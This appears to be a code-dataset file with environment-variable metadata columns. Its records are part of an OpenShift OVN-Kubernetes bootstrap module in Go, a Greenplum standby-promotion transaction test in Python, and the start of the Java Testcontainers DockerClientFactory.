// handle upgrade logic for gateway mode in OVN-K plugin (migration from hidden config map to using proper API)
// TODO: Remove this logic in future releases when we are sure everyone has migrated away from the config-map
cm := &corev1.ConfigMap{}
nsn := types.NamespacedName{Namespace: "openshift-network-operator", Name: "gateway-mode-config"}
err := kubeClient.Get(context.TODO(), nsn, cm)
modeOverride := OVN_SHARED_GW_MODE
routeViaHost := false
if err != nil {
klog.Infof("Did not find gateway-mode-config. Using default gateway mode: %s", OVN_SHARED_GW_MODE)
} else {
modeOverride = cm.Data["mode"]
if modeOverride != OVN_SHARED_GW_MODE && modeOverride != OVN_LOCAL_GW_MODE {
klog.Warningf("gateway-mode-config does not match %q or %q, is: %q. Using default gateway mode: %s",
OVN_LOCAL_GW_MODE, OVN_SHARED_GW_MODE, modeOverride, OVN_SHARED_GW_MODE)
modeOverride = OVN_SHARED_GW_MODE
}
}
if modeOverride == OVN_LOCAL_GW_MODE {
routeViaHost = true
}
conf.Spec.DefaultNetwork.OVNKubernetesConfig.GatewayConfig = &operv1.GatewayConfig{
RoutingViaHost: routeViaHost,
}
klog.Infof("Gateway mode is %s", modeOverride)
}
func getMasterAddresses(kubeClient crclient.Client, controlPlaneReplicaCount int, hypershift bool) ([]string, error) {
var heartBeat int
masterNodeList := &corev1.NodeList{}
ovnMasterAddresses := make([]string, 0, controlPlaneReplicaCount)
if hypershift {
for i := 0; i < controlPlaneReplicaCount; i++ {
ovnMasterAddresses = append(ovnMasterAddresses, fmt.Sprintf("ovnkube-master-%d.ovnkube-master-internal.%s.svc.cluster.local", i, os.Getenv("HOSTED_CLUSTER_NAMESPACE")))
}
} else {
err := wait.PollImmediate(OVN_MASTER_DISCOVERY_POLL*time.Second, time.Duration(OVN_MASTER_DISCOVERY_TIMEOUT)*time.Second, func() (bool, error) {
matchingLabels := &crclient.MatchingLabels{"node-role.kubernetes.io/master": ""}
if err := kubeClient.List(context.TODO(), masterNodeList, matchingLabels); err != nil {
return false, err
}
if len(masterNodeList.Items) != 0 && controlPlaneReplicaCount == len(masterNodeList.Items) {
return true, nil
}
heartBeat++
if heartBeat%3 == 0 {
klog.V(2).Infof("Waiting to complete OVN bootstrap: found (%d) master nodes out of (%d) expected: timing out in %d seconds",
len(masterNodeList.Items), controlPlaneReplicaCount, OVN_MASTER_DISCOVERY_TIMEOUT-OVN_MASTER_DISCOVERY_POLL*heartBeat)
}
return false, nil
})
if wait.ErrWaitTimeout == err {
klog.Warningf("Timeout exceeded while bootstraping OVN, expected amount of control plane nodes (%v) do not match found (%v): %s, continuing deployment with found replicas", controlPlaneReplicaCount, len(masterNodeList.Items))
// On certain types of cluster this condition will never be met (assisted installer, for example)
// As to not hold the reconciliation loop for too long on such clusters: dynamically modify the timeout
// to a shorter and shorter value. Never reach 0 however as that will result in a `PollInfinity`.
// Right now we'll do:
// - First reconciliation 250 second timeout
// - Second reconciliation 130 second timeout
// - >= Third reconciliation 10 second timeout
if OVN_MASTER_DISCOVERY_TIMEOUT-OVN_MASTER_DISCOVERY_BACKOFF > 0 {
OVN_MASTER_DISCOVERY_TIMEOUT = OVN_MASTER_DISCOVERY_TIMEOUT - OVN_MASTER_DISCOVERY_BACKOFF
}
} else if err != nil {
return nil, fmt.Errorf("Unable to bootstrap OVN, err: %v", err)
}
for _, masterNode := range masterNodeList.Items {
var ip string
for _, address := range masterNode.Status.Addresses {
if address.Type == corev1.NodeInternalIP {
ip = address.Address
break
}
}
if ip == "" {
return nil, fmt.Errorf("No InternalIP found on master node '%s'", masterNode.Name)
}
ovnMasterAddresses = append(ovnMasterAddresses, ip)
}
}
return ovnMasterAddresses, nil
}
func bootstrapOVN(conf *operv1.Network, kubeClient cnoclient.Client) (*bootstrap.OVNBootstrapResult, error) {
clusterConfig := &corev1.ConfigMap{}
clusterConfigLookup := types.NamespacedName{Name: CLUSTER_CONFIG_NAME, Namespace: CLUSTER_CONFIG_NAMESPACE}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), clusterConfigLookup, clusterConfig); err != nil {
return nil, fmt.Errorf("Unable to bootstrap OVN, unable to retrieve cluster config: %s", err)
}
rcD := replicaCountDecoder{}
if err := yaml.Unmarshal([]byte(clusterConfig.Data["install-config"]), &rcD); err != nil {
return nil, fmt.Errorf("Unable to bootstrap OVN, unable to unmarshal install-config: %s", err)
}
hc := NewHyperShiftConfig()
ovnConfigResult, err := bootstrapOVNConfig(conf, kubeClient, hc)
if err != nil {
return nil, fmt.Errorf("Unable to bootstrap OVN config, err: %v", err)
}
var controlPlaneReplicaCount int
if hc.Enabled {
controlPlaneReplicaCount = ovnConfigResult.HyperShiftConfig.ControlPlaneReplicas
} else {
controlPlaneReplicaCount, _ = strconv.Atoi(rcD.ControlPlane.Replicas)
}
ovnMasterAddresses, err := getMasterAddresses(kubeClient.ClientFor("").CRClient(), controlPlaneReplicaCount, hc.Enabled)
if err != nil {
return nil, err
}
sort.Strings(ovnMasterAddresses)
// clusterInitiator is used to avoid a split-brain scenario for the OVN NB/SB DBs. We want to consistently initialize
// any OVN cluster which is bootstrapped here, to the same initiator (should it still exists), hence we annotate the
// network.operator.openshift.io CRD with this information and always try to re-use the same member for the OVN RAFT
// cluster initialization
var clusterInitiator string
currentAnnotation := conf.GetAnnotations()
if cInitiator, ok := currentAnnotation[names.OVNRaftClusterInitiator]; ok && currentInitiatorExists(ovnMasterAddresses, cInitiator) {
clusterInitiator = cInitiator
} else {
clusterInitiator = ovnMasterAddresses[0]
if currentAnnotation == nil {
currentAnnotation = map[string]string{
names.OVNRaftClusterInitiator: clusterInitiator,
}
} else {
currentAnnotation[names.OVNRaftClusterInitiator] = clusterInitiator
}
conf.SetAnnotations(currentAnnotation)
}
// Retrieve existing daemonsets or statefulsets status - used for deciding if upgrades should happen
var nsn types.NamespacedName
masterStatus := &bootstrap.OVNUpdateStatus{}
nodeStatus := &bootstrap.OVNUpdateStatus{}
ipsecStatus := &bootstrap.OVNUpdateStatus{}
prepullerStatus := &bootstrap.OVNUpdateStatus{}
if hc.Enabled {
masterSS := &appsv1.StatefulSet{
TypeMeta: metav1.TypeMeta{
Kind: "StatefulSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: hc.Namespace, Name: "ovnkube-master"}
if err := kubeClient.ClientFor(cnoclient.ManagementClusterName).CRClient().Get(context.TODO(), nsn, masterSS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing master DaemonSet: %w", err)
} else {
masterStatus = nil
}
} else {
masterStatus.Kind = "StatefulSet"
masterStatus.Namespace = masterSS.Namespace
masterStatus.Name = masterSS.Name
masterStatus.IPFamilyMode = masterSS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
masterStatus.Version = masterSS.GetAnnotations()["release.openshift.io/version"]
masterStatus.Progressing = statefulSetProgressing(masterSS)
}
} else {
masterDS := &appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
Kind: "DaemonSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: "openshift-ovn-kubernetes", Name: "ovnkube-master"}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), nsn, masterDS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing master DaemonSet: %w", err)
} else {
masterStatus = nil
}
} else {
masterStatus.Kind = "DaemonSet"
masterStatus.Namespace = masterDS.Namespace
masterStatus.Name = masterDS.Name
masterStatus.IPFamilyMode = masterDS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
masterStatus.Version = masterDS.GetAnnotations()["release.openshift.io/version"]
masterStatus.Progressing = daemonSetProgressing(masterDS, false)
}
}
nodeDS := &appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
Kind: "DaemonSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: "openshift-ovn-kubernetes", Name: "ovnkube-node"}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), nsn, nodeDS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing node DaemonSet: %w", err)
} else {
nodeStatus = nil
}
} else {
nodeStatus.Kind = "DaemonSet"
nodeStatus.Namespace = nodeDS.Namespace
nodeStatus.Name = nodeDS.Name
nodeStatus.IPFamilyMode = nodeDS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
nodeStatus.Version = nodeDS.GetAnnotations()["release.openshift.io/version"]
nodeStatus.Progressing = daemonSetProgressing(nodeDS, true)
}
prePullerDS := &appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
Kind: "DaemonSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: "openshift-ovn-kubernetes", Name: "ovnkube-upgrades-prepuller"}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), nsn, prePullerDS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing prepuller DaemonSet: %w", err)
} else {
prepullerStatus = nil
}
} else {
prepullerStatus.Namespace = prePullerDS.Namespace
prepullerStatus.Name = prePullerDS.Name
prepullerStatus.IPFamilyMode = prePullerDS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
prepullerStatus.Version = prePullerDS.GetAnnotations()["release.openshift.io/version"]
prepullerStatus.Progressing = daemonSetProgressing(prePullerDS, true)
}
ipsecDS := &appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
Kind: "DaemonSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: "openshift-ovn-kubernetes", Name: "ovn-ipsec"}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), nsn, ipsecDS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing ipsec DaemonSet: %w", err)
} else {
ipsecStatus = nil
}
} else {
ipsecStatus.Namespace = ipsecDS.Namespace
ipsecStatus.Name = ipsecDS.Name
ipsecStatus.IPFamilyMode = ipsecDS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
ipsecStatus.Version = ipsecDS.GetAnnotations()["release.openshift.io/version"]
}
res := bootstrap.OVNBootstrapResult{
MasterAddresses: ovnMasterAddresses,
ClusterInitiator: clusterInitiator,
MasterUpdateStatus: masterStatus,
NodeUpdateStatus: nodeStatus,
IPsecUpdateStatus: ipsecStatus,
PrePullerUpdateStatus: prepullerStatus,
OVNKubernetesConfig: ovnConfigResult,
FlowsConfig: bootstrapFlowsConfig(kubeClient.ClientFor("").CRClient()),
}
return &res, nil
}
// bootstrapFlowsConfig looks for the openshift-network-operator/ovs-flows-config configmap, and
// returns it or returns nil if it does not exist (or can't be properly parsed).
// Usually, the second argument will be net.LookupIP
func bootstrapFlowsConfig(cl crclient.Reader) *bootstrap.FlowsConfig {
cm := corev1.ConfigMap{}
if err := cl.Get(context.TODO(), types.NamespacedName{
Name: OVSFlowsConfigMapName,
Namespace: OVSFlowsConfigNamespace,
}, &cm); err != nil {
if !apierrors.IsNotFound(err) {
klog.Warningf("%s: error fetching configmap: %v", OVSFlowsConfigMapName, err)
}
// ovs-flows-config is not defined. Ignoring from bootstrap
return nil
}
fc := bootstrap.FlowsConfig{}
// fetching string fields and transforming them to OVS format
if st, ok := cm.Data["sharedTarget"]; ok {
fc.Target = st
} else if np, ok := cm.Data["nodePort"]; ok {
// empty host will be interpreted as Node IP by ovn-kubernetes
fc.Target = ":" + np
} else {
klog.Warningf("%s: wrong data section: either sharedTarget or nodePort sections are needed: %+v",
OVSFlowsConfigMapName, cm.Data)
return nil
}
if catStr, ok := cm.Data["cacheActiveTimeout"]; ok {
if catd, err := time.ParseDuration(catStr); err != nil {
klog.Warningf("%s: wrong cacheActiveTimeout value %s. Ignoring: %v",
OVSFlowsConfigMapName, catStr, err)
} else {
catf := catd.Seconds()
catu := uint(catf)
if catf != float64(catu) {
klog.Warningf("%s: cacheActiveTimeout %s will be truncated to %d seconds",
OVSFlowsConfigMapName, catStr, catu)
}
fc.CacheActiveTimeout = &catu
}
}
if cmfStr, ok := cm.Data["cacheMaxFlows"]; ok {
if cmf, err := strconv.ParseUint(cmfStr, 10, 32); err != nil {
klog.Warningf("%s: wrong cacheMaxFlows value %s. Ignoring: %v",
OVSFlowsConfigMapName, cmfStr, err)
} else {
cmfu := uint(cmf)
fc.CacheMaxFlows = &cmfu
}
}
if sStr, ok := cm.Data["sampling"]; ok {
if sampling, err := strconv.ParseUint(sStr, 10, 32); err != nil {
klog.Warningf("%s: wrong sampling value %s. Ignoring: %v",
OVSFlowsConfigMapName, sStr, err)
} else {
su := uint(sampling)
fc.Sampling = &su
}
}
return &fc
}
func currentInitiatorExists(ovnMasterAddresses []string, configInitiator string) bool {
for _, masterIP := range ovnMasterAddresses {
if masterIP == configInitiator {
return true
}
}
return false
}
func dbList(masterIPs []string, port string) string {
addrs := make([]string, len(masterIPs))
for i, ip := range masterIPs {
addrs[i] = "ssl:" + net.JoinHostPort(ip, port)
}
return strings.Join(addrs, ",")
}
func listenDualStack(masterIP string) string {
if strings.Contains(masterIP, ":") {
// IPv6 master, make the databases listen dual-stack
return ":[::]"
} else {
// IPv4 master, be IPv4-only for backward-compatibility
return ""
}
}
// shouldUpdateOVNKonIPFamilyChange determines if we should roll out changes to
// the master and node daemonsets on IP family configuration changes.
// We rollout changes on masters first when there is a configuration change.
// Configuration changes take precedence over upgrades.
func shouldUpdateOVNKonIPFamilyChange(ovn bootstrap.OVNBootstrapResult, ipFamilyMode string) (updateNode, updateMaster bool) {
// Fresh cluster - full steam ahead!
if ovn.NodeUpdateStatus == nil || ovn.MasterUpdateStatus == nil {
return true, true
}
// check current IP family mode
nodeIPFamilyMode := ovn.NodeUpdateStatus.IPFamilyMode
masterIPFamilyMode := ovn.MasterUpdateStatus.IPFamilyMode
// if there are no annotations this is a fresh cluster
if nodeIPFamilyMode == "" || masterIPFamilyMode == "" {
return true, true
}
// exit if there are no IP family mode changes
if nodeIPFamilyMode == ipFamilyMode && masterIPFamilyMode == ipFamilyMode {
return true, true
}
// If the master config has changed update only the master, the node will be updated later
if masterIPFamilyMode != ipFamilyMode {
klog.V(2).Infof("IP family mode change detected to %s, updating OVN-Kubernetes master", ipFamilyMode)
return false, true
}
// Don't rollout the changes on nodes until the master daemonset rollout has finished
if ovn.MasterUpdateStatus.Progressing {
klog.V(2).Infof("Waiting for OVN-Kubernetes master daemonset IP family mode rollout before updating node")
return false, true
}
klog.V(2).Infof("OVN-Kubernetes master daemonset rollout complete, updating IP family mode on node daemonset")
return true, true
}
// shouldUpdateOVNKonPrepull implements a simple pre-pulling daemonset. It ensures the ovn-k
// container image is (probably) already pulled by every node.
// If the existing node daemonset has a different version then what we would like to apply, we first
// roll out a no-op daemonset. Then, when that has rolled out to 100% of the cluster or has stopped
// progressing, proceed with the node upgrade.
func shouldUpdateOVNKonPrepull(ovn bootstrap.OVNBootstrapResult, releaseVersion string) (updateNode, renderPrepull bool) {
// Fresh cluster - full steam ahead! No need to wait for pre-puller.
if ovn.NodeUpdateStatus == nil {
klog.V(3).Infof("Fresh cluster, no need for prepuller")
return true, false
}
// if node is already upgraded, then no need to pre-pull
// Return true so that we reconcile any changes that somehow could have happened.
existingNodeVersion := ovn.NodeUpdateStatus.Version
if existingNodeVersion == releaseVersion {
klog.V(3).Infof("OVN-Kubernetes node is already in the expected release.")
return true, false
}
// at this point, we've determined we need an upgrade
if ovn.PrePullerUpdateStatus == nil {
klog.Infof("Rolling out the no-op prepuller daemonset...")
return false, true
}
// If pre-puller just pulled a new upgrade image and then we
// downgrade immediately, we might wanna make prepuller pull the downgrade image.
existingPrePullerVersion := ovn.PrePullerUpdateStatus.Version
if existingPrePullerVersion != releaseVersion {
klog.Infof("Rendering prepuller daemonset to update its image...")
return false, true
}
if ovn.PrePullerUpdateStatus.Progressing {
klog.Infof("Waiting for ovnkube-upgrades-prepuller daemonset to finish pulling the image before updating node")
return false, true
}
klog.Infof("OVN-Kube upgrades-prepuller daemonset rollout complete, now starting node rollouts")
return true, false
}
// shouldUpdateOVNKonUpgrade determines if we should roll out changes to
// the master and node daemonsets on upgrades. We roll out nodes first,
// then masters. Downgrades, we do the opposite.
func shouldUpdateOVNKonUpgrade(ovn bootstrap.OVNBootstrapResult, releaseVersion string) (updateNode, updateMaster bool) {
// Fresh cluster - full steam ahead!
if ovn.NodeUpdateStatus == nil || ovn.MasterUpdateStatus == nil {
return true, true
}
nodeVersion := ovn.NodeUpdateStatus.Version
masterVersion := ovn.MasterUpdateStatus.Version
// shortcut - we're all rolled out.
// Return true so that we reconcile any changes that somehow could have happened.
if nodeVersion == releaseVersion && masterVersion == releaseVersion {
klog.V(2).Infof("OVN-Kubernetes master and node already at release version %s; no changes required", releaseVersion)
return true, true
}
// compute version delta
// versionUpgrade means the existing daemonSet needs an upgrade.
masterDelta := compareVersions(masterVersion, releaseVersion)
nodeDelta := compareVersions(nodeVersion, releaseVersion)
if masterDelta == versionUnknown || nodeDelta == versionUnknown {
klog.Warningf("could not determine ovn-kubernetes daemonset update directions; node: %s, master: %s, release: %s",
nodeVersion, masterVersion, releaseVersion)
return true, true
}
klog.V(2).Infof("OVN-Kubernetes master version %s -> latest %s; delta %s", masterVersion, releaseVersion, masterDelta)
klog.V(2).Infof("OVN-Kubernetes node version %s -> latest %s; delta %s", nodeVersion, releaseVersion, nodeDelta)
// 9 cases
// +-------------+---------------+-----------------+------------------+
// | Delta | master upg. | master OK | master downg. |
// +-------------+---------------+-----------------+------------------+
// | node upg. | upgrade node | error | error |
// | node OK | wait for node | done | error |
// | node downg. | error | wait for master | downgrade master |
// +-------------+---------------+-----------------+------------------++
// both older (than CNO)
// Update node only.
if masterDelta == versionUpgrade && nodeDelta == versionUpgrade {
klog.V(2).Infof("Upgrading OVN-Kubernetes node before master")
return true, false
}
// master older, node updated
// update master if node is rolled out
if masterDelta == versionUpgrade && nodeDelta == versionSame {
if ovn.NodeUpdateStatus.Progressing {
klog.V(2).Infof("Waiting for OVN-Kubernetes node update to roll out before updating master")
return true, false
}
klog.V(2).Infof("OVN-Kubernetes node update rolled out; now updating master")
return true, true
}
// both newer
// downgrade master before node
if masterDelta == versionDowngrade && nodeDelta == versionDowngrade {
klog.V(2).Infof("Downgrading OVN-Kubernetes master before node")
return false, true
}
// master same, node needs downgrade
// wait for master rollout
if masterDelta == versionSame && nodeDelta == versionDowngrade {
if ovn.MasterUpdateStatus.Progressing {
klog.V(2).Infof("Waiting for OVN-Kubernetes master downgrade to roll out before downgrading node")
return false, true
}
klog.V(2).Infof("OVN-Kubernetes master update rolled out; now downgrading node")
return true, true
}
// unlikely, should be caught above
if masterDelta == versionSame && nodeDelta == versionSame {
return true, true
}
klog.Warningf("OVN-Kubernetes daemonset versions inconsistent. node: %s, master: %s, release: %s",
nodeVersion, masterVersion, releaseVersion)
return true, true
}
// daemonSetProgressing returns true if a daemonset is rolling out a change.
// If allowHung is true, then treat a daemonset hung at 90% as "done" for our purposes.
func daemonSetProgressing(ds *appsv1.DaemonSet, allowHung bool) bool {
status := ds.Status
// Copy-pasted from status_manager: Determine if a DaemonSet is progressing
progressing := (status.UpdatedNumberScheduled < status.DesiredNumberScheduled ||
status.NumberUnavailable > 0 ||
status.NumberAvailable == 0 ||
ds.Generation > status.ObservedGeneration)
s := "progressing"
if !progressing {
s = "complete"
}
klog.V(2).Infof("daemonset %s/%s rollout %s; %d/%d scheduled; %d unavailable; %d available; generation %d -> %d",
ds.Namespace, ds.Name, s, status.UpdatedNumberScheduled, status.DesiredNumberScheduled,
status.NumberUnavailable, status.NumberAvailable, ds.Generation, status.ObservedGeneration)
if !progressing {
klog.V(2).Infof("daemonset %s/%s rollout complete", ds.Namespace, ds.Name)
return false
}
// If we're hung, but max(90% of nodes, 1) have been updated, then act as if not progressing
if allowHung {
_, hung := ds.GetAnnotations()[names.RolloutHungAnnotation]
maxBehind := int(math.Max(1, math.Floor(float64(status.DesiredNumberScheduled)*0.1)))
numBehind := int(status.DesiredNumberScheduled - status.UpdatedNumberScheduled)
if hung && numBehind <= maxBehind {
klog.Warningf("daemonset %s/%s rollout seems to have hung with %d/%d behind, force-continuing", ds.Namespace, ds.Name, numBehind, status.DesiredNumberScheduled)
return false
}
}
return true
}
// statefulSetProgressing returns true if a statefulset is rolling out a change.
// If allowHung is true, then treat a statefulset hung at 90% as "done" for our purposes.
func statefulSetProgressing(ss *appsv1.StatefulSet) bool {
status := ss.Status
// Copy-pasted from status_manager: Determine if a DaemonSet is progressing
progressing := (status.ReadyReplicas < status.Replicas ||
status.AvailableReplicas == 0 ||
ss.Generation > status.ObservedGeneration)
s := "progressing"
if !progressing {
s = "complete"
}
klog.V(2).Infof("statefulset %s/%s rollout %s; %d/%d scheduled; %d available; generation %d -> %d",
ss.Namespace, ss.Name, s, status.ReadyReplicas, status.Replicas,
status.AvailableReplicas, ss.Generation, status.ObservedGeneration)
if !progressing {
klog.V(2).Infof("statefulset %s/%s rollout complete", ss.Namespace, ss.Name)
return false
}
return true
}
// setOVNObjectAnnotation annotates the OVNkube master and node daemonset
// it also annotated the template with the provided key and value to force the rollout
func setOVNObjectAnnotation(objs []*uns.Unstructured, key, value string) error {
for _, obj := range objs {
if obj.GetAPIVersion() == "apps/v1" &&
(obj.GetKind() == "DaemonSet" || obj.GetKind() == "StatefulSet") &&
(obj.GetName() == "ovnkube-master" || obj.GetName() == "ovnkube-node") {
// set daemonset annotation
anno := obj.GetAnnotations()
if anno == nil {
anno = map[string]string{}
}
anno[key] = value
obj.SetAnnotations(anno)
// set pod template annotation
anno, _, _ = uns.NestedStringMap(obj.Object, "spec", "template", "metadata", "annotations")
if anno == nil {
anno = map[string]string{}
}
anno[key] = value
if err := uns.SetNestedStringMap(obj.Object, anno, "spec", "template", "metadata", "annotations"); err != nil {
return err
}
}
}
return nil
}
| [
"\"RELEASE_VERSION\"",
"\"OVN_IMAGE\"",
"\"KUBE_RBAC_PROXY_IMAGE\"",
"\"TOKEN_MINTER_IMAGE\"",
"\"TOKEN_AUDIENCE\"",
"\"OVN_NB_RAFT_ELECTION_TIMER\"",
"\"OVN_SB_RAFT_ELECTION_TIMER\"",
"\"OVN_CONTROLLER_INACTIVITY_PROBE\"",
"\"OVN_CONTROLLER_INACTIVITY_PROBE\"",
"\"OVN_NB_INACTIVITY_PROBE\"",
"\"OVN_NORTHD_PROBE_INTERVAL\"",
"\"RELEASE_VERSION\"",
"\"RELEASE_VERSION\"",
"\"HOSTED_CLUSTER_NAMESPACE\""
] | [] | [
"TOKEN_AUDIENCE",
"OVN_SB_RAFT_ELECTION_TIMER",
"KUBE_RBAC_PROXY_IMAGE",
"OVN_CONTROLLER_INACTIVITY_PROBE",
"OVN_IMAGE",
"TOKEN_MINTER_IMAGE",
"OVN_NB_RAFT_ELECTION_TIMER",
"HOSTED_CLUSTER_NAMESPACE",
"OVN_NB_INACTIVITY_PROBE",
"RELEASE_VERSION",
"OVN_NORTHD_PROBE_INTERVAL"
] | [] | ["TOKEN_AUDIENCE", "OVN_SB_RAFT_ELECTION_TIMER", "KUBE_RBAC_PROXY_IMAGE", "OVN_CONTROLLER_INACTIVITY_PROBE", "OVN_IMAGE", "TOKEN_MINTER_IMAGE", "OVN_NB_RAFT_ELECTION_TIMER", "HOSTED_CLUSTER_NAMESPACE", "OVN_NB_INACTIVITY_PROBE", "RELEASE_VERSION", "OVN_NORTHD_PROBE_INTERVAL"] | go | 11 | 0 | |
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/walrepl/xact/test_basic.py | #!/usr/bin/env python
"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from gppylib.commands.base import Command
from tinctest import logger
from mpp.lib.PSQL import PSQL
from mpp.models import MPPTestCase
from mpp.gpdb.tests.storage.walrepl import lib as walrepl
import mpp.gpdb.tests.storage.walrepl.run
from mpp.gpdb.tests.storage.walrepl.lib.fault import *
import os
import re
import subprocess
import socket
import time
import shutil
import sys
import signal
class xansrep(mpp.gpdb.tests.storage.walrepl.run.StandbyRunMixin, MPPTestCase):
def tearDown(self):
self.standby.remove_catalog_standby("")
super(xansrep, self).tearDown()
#self.reset_fault('all')
Gpfault().reset_fault('transaction_abort_after_distributed_prepared')
Gpfault().reset_fault('dtm_broadcast_commit_prepared')
def run_sql(self, sql, port=os.environ.get('PGPORT', 5432)):
return subprocess.Popen(['psql',
'-c', sql,
'-p', port],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_xansrep(self):
"""
Test for distributed transactions. Here are two cases:
A. a transaction in prepared state
B. a transaction after broadcast commit prepared
In case A, the transaction will be aborted, and B should be visible.
The flow of this test is as follows.
1. Initiate the Standby using the Master (primary) postmaster
paramerters.
2. B: Inject the fault to suspend Mater after Commit done.
3. B: Now execute a transaction and commit it. This master will be blocked.
4. A: Inject the fault to suspend Mater after Prepare done.
5. A: Now execute a transaction and commit it. This transaction will be blocked.
6. Promote the standby.
7. Verify the result, transaction A results should not be visible and
transaction B results should be visible.
"""
PSQL.run_sql_command('DROP table if exists xansrep_prepare')
PSQL.run_sql_command('DROP table if exists xansrep_commit')
PSQL.run_sql_command('DROP table if exists xansrep_dummy')
PSQL.run_sql_command('create table xansrep_dummy (a int)')
PSQL.run_sql_command('insert into xansrep_dummy '
'select * from generate_series(1, 1000)')
Command('remove standby', 'gpinitstandby -ra').run()
fault = Gpfault()
# 1. Initial setup
res = self.standby.create()
self.assertEqual(res, 0)
res = self.standby.start()
self.assertTrue(res.wasSuccessful())
# wait for the walreceiver to start
num_walsender = self.wait_for_walsender()
self.assertEqual(num_walsender, 1)
# 2. Inject fault at commit prepared state
result = fault.suspend_at('dtm_broadcast_commit_prepared')
logger.info(result.stdout)
self.assertEqual(result.rc, 0, result.stdout)
# 3. Now execute a transaction and commit it. The backend is expected
# be blocked.
logger.info('Create table xansrep_commit...')
# Due to the suspend, we don't wait for the result
proc = self.run_sql('create table xansrep_commit as '
'select * from xansrep_dummy')
logger.info('Check if suspend fault is hit after commit...')
triggered = fault.wait_triggered('dtm_broadcast_commit_prepared')
self.assertTrue(triggered, 'Fault was not triggered')
# 4. Inject fault at prepared state
result = fault.suspend_at(
'transaction_abort_after_distributed_prepared')
logger.info(result.stdout)
self.assertEqual(result.rc, 0, result.stdout)
# 5. Now execute a transaction and commit it. The backend is expected
# be blocked.
logger.info('Create table xansrep_prepare...')
# Due to the suspend, we don't wait for the result
proc = self.run_sql('create table xansrep_prepare (a int)')
logger.info('Check if suspend fault is hit ...')
triggered = fault.wait_triggered(
'transaction_abort_after_distributed_prepared')
self.assertTrue(triggered, 'Fault was not triggered')
# 6. Promote standby
# We don't kill/stop the primary, as it's convenient for
# next testing, and the outcome wouldn't change.
self.standby.promote()
# 7. Verify the result replicated to the standby.
logger.info('Verify if table xansrep_prepare exists...')
proc = self.run_sql('select * from xansrep_prepare',
str(self.standby.port))
# the table should not exist
stderr = proc.communicate()[1]
logger.info(stderr)
search = "ERROR: relation \"xansrep_prepare\" does not exist"
self.assertTrue(stderr.find(search) >= 0)
logger.info('Verify if table xansrep_commit exists...')
proc = self.run_sql('select count(*) from xansrep_commit',
str(self.standby.port))
# the table should exit
stdout = proc.communicate()[0]
logger.info(stdout)
search = "1000"
self.assertTrue(stdout.find(search) >= 0)
logger.info('Pass')
| [] | [] | [
"PGPORT"
] | [] | ["PGPORT"] | python | 1 | 0 | |
core/src/main/java/org/testcontainers/DockerClientFactory.java | package org.testcontainers;
import com.github.dockerjava.api.DockerClient;
import com.github.dockerjava.api.command.CreateContainerCmd;
import com.github.dockerjava.api.exception.InternalServerErrorException;
import com.github.dockerjava.api.exception.NotFoundException;
import com.github.dockerjava.api.model.AccessMode;
import com.github.dockerjava.api.model.Bind;
import com.github.dockerjava.api.model.Image;
import com.github.dockerjava.api.model.Info;
import com.github.dockerjava.api.model.Version;
import com.github.dockerjava.api.model.Volume;
import com.github.dockerjava.core.command.ExecStartResultCallback;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.collect.ImmutableMap;
import lombok.Getter;
import lombok.SneakyThrows;
import lombok.Synchronized;
import lombok.extern.slf4j.Slf4j;
import org.testcontainers.dockerclient.DockerClientProviderStrategy;
import org.testcontainers.dockerclient.DockerMachineClientProviderStrategy;
import org.testcontainers.images.TimeLimitedLoggedPullImageResultCallback;
import org.testcontainers.utility.ComparableVersion;
import org.testcontainers.utility.MountableFile;
import org.testcontainers.utility.ResourceReaper;
import org.testcontainers.utility.TestcontainersConfiguration;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.ServiceLoader;
import java.util.UUID;
import java.util.function.BiFunction;
import java.util.function.Consumer;
/**
* Singleton class that provides initialized Docker clients.
* <p>
* The correct client configuration to use will be determined on first use, and cached thereafter.
*/
@Slf4j
public class DockerClientFactory {
public static final ThreadGroup TESTCONTAINERS_THREAD_GROUP = new ThreadGroup("testcontainers");
public static final String TESTCONTAINERS_LABEL = DockerClientFactory.class.getPackage().getName();
public static final String TESTCONTAINERS_SESSION_ID_LABEL = TESTCONTAINERS_LABEL + ".sessionId";
public static final String SESSION_ID = UUID.randomUUID().toString();
